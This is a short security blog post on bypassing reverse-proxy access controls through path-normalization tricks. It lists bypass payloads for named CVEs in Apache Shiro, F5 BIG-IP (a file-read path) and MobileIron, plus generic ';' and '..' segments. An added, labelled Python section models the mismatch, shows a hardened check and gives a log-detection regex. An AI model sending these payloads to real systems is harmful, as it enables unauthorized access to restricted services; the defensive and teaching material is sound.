acl-bypass-magic

The fascination of web security is that a single payload can hit the heart of a system.

Orange talked about ACL bypass at Black Hat USA 2018. Click here to enjoy his presentation.

What’s more, in one private bug bounty program, Orange also used this vuln to attack an internal service. I have enjoyed the report more than ten times.

Yes, this exists in the real world. But you need to guess the services behind the reverse proxy, or take the time to read the system documentation to guess (brute force) the restricted services.

Apache Shiro (CVE-2020-11989)

Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

payload

/;/admin_endpoint

Apache Shiro (CVE-2020-13933)

Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.

payload

/test/%3badmin_endpoint

F5 BIG-IP (CVE-2020-5902)

payload

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp

MobileIron Authentication Bypass (CVE-2020-15506)

payload

/mifs/.;/services/LogService

https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html

Here we go. Let’s copy and paste the payloads:

/..;/
/;/
/.;/
/../
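All four payload shapes work for the same reason: the reverse proxy matches its ACL against the literal request path, while the backend strips `;param` path parameters and resolves `.`/`..` segments before routing, so the two layers disagree about which resource is being requested. The following Python example, added here and not taken from the original post or from any of the affected products, models a naive proxy view and a servlet-style backend view of a path, reports requests where the ACL decision would differ, shows a proxy-side decision that closes the gap, and triages constructed access-log lines for the segment shapes listed above. The restricted prefix `/admin`, the function names and the log lines are all assumptions made for the example.

```python
"""
Added example (not part of the original post): modelling the path-normalization
mismatch behind the ACL-bypass payloads above, from the defender's side.

Assumptions, all constructed for this example:
  * the reverse proxy matches its ACL against the literal request path;
  * the backend behaves like a Java servlet container: it percent-decodes the
    path, drops ";param" matrix parameters from each segment and then resolves
    "." and ".." segments before routing;
  * /admin is the restricted prefix, and the log lines are made up.
"""
import re
from urllib.parse import unquote

RESTRICTED_PREFIXES = ("/admin",)   # constructed ACL for the example


def proxy_view(raw_path):
    """Naive proxy: the ACL is matched against the raw path as received."""
    return raw_path


def backend_view(raw_path):
    """Canonical path as a servlet-style backend would route it."""
    segments = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]        # "..;" -> "..", ".;" -> ".", ";" -> ""
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_restricted(path):
    return any(path == p or path.startswith(p + "/") for p in RESTRICTED_PREFIXES)


def acl_mismatch(raw_path):
    """True when the naive proxy lets the request through but the backend
    would serve something under a restricted prefix."""
    return (not is_restricted(proxy_view(raw_path))
            and is_restricted(backend_view(raw_path)))


def hardened_acl_allows(raw_path):
    """Proxy-side decision that closes the gap: refuse any path carrying
    path parameters or dot segments, and evaluate the ACL on the canonical
    form rather than the raw one."""
    decoded = unquote(raw_path)
    if ";" in decoded:
        return False
    if any(seg in (".", "..") for seg in decoded.split("/")):
        return False
    return not is_restricted(backend_view(raw_path))


# Request-log triage: the segment shapes from the post, plus the %3b form of ';'.
SUSPICIOUS = re.compile(r"/\.\.;/|/;/|/\.;/|/\.\./|%3b", re.IGNORECASE)


def flag_log_lines(lines):
    """Return (line, path) for every access-log line whose request path
    carries one of the traversal / path-parameter shapes."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', line)
        if m and SUSPICIOUS.search(m.group(1)):
            flagged.append((line, m.group(1)))
    return flagged


SAMPLE_LOG = [   # constructed lines, not real traffic
    '10.0.0.5 - - [01/Oct/2020:10:00:00 +0000] "GET /public/index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Oct/2020:10:00:01 +0000] "GET /public/..;/admin/users HTTP/1.1" 200 2048',
    '10.0.0.6 - - [01/Oct/2020:10:00:02 +0000] "GET /;/admin/users HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Oct/2020:10:00:03 +0000] "GET /test/%3badmin/users HTTP/1.1" 200 2048',
    '10.0.0.8 - - [01/Oct/2020:10:00:04 +0000] "GET /admin/users HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for raw in ("/public/..;/admin/users", "/;/admin/users", "/.;/admin/users",
                "/public/../admin/users", "/admin/users", "/public/index.html"):
        print(f"{raw:26} backend={backend_view(raw):20} "
              f"mismatch={acl_mismatch(raw)!s:5} hardened_allows={hardened_acl_allows(raw)}")
    for _, path in flag_log_lines(SAMPLE_LOG):
        print("FLAG", path)
```

The useful signal for a defender is a `200` on a path that the ACL-on-raw-path view would have treated as public: the `acl_mismatch` check is what a WAF or proxy rule should be computing, and `hardened_acl_allows` shows the two fixes that matter, rejecting path parameters and dot segments outright and matching the ACL on the canonical form. The log triage regex is deliberately narrow to the shapes in this post; a real deployment would also watch for other encodings of `;` and `.`.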

Bug bounty tips:
An ACL bypass vuln on its own seems harmless, so I suggest you dig in to get system data or chain it with other vulns.

reference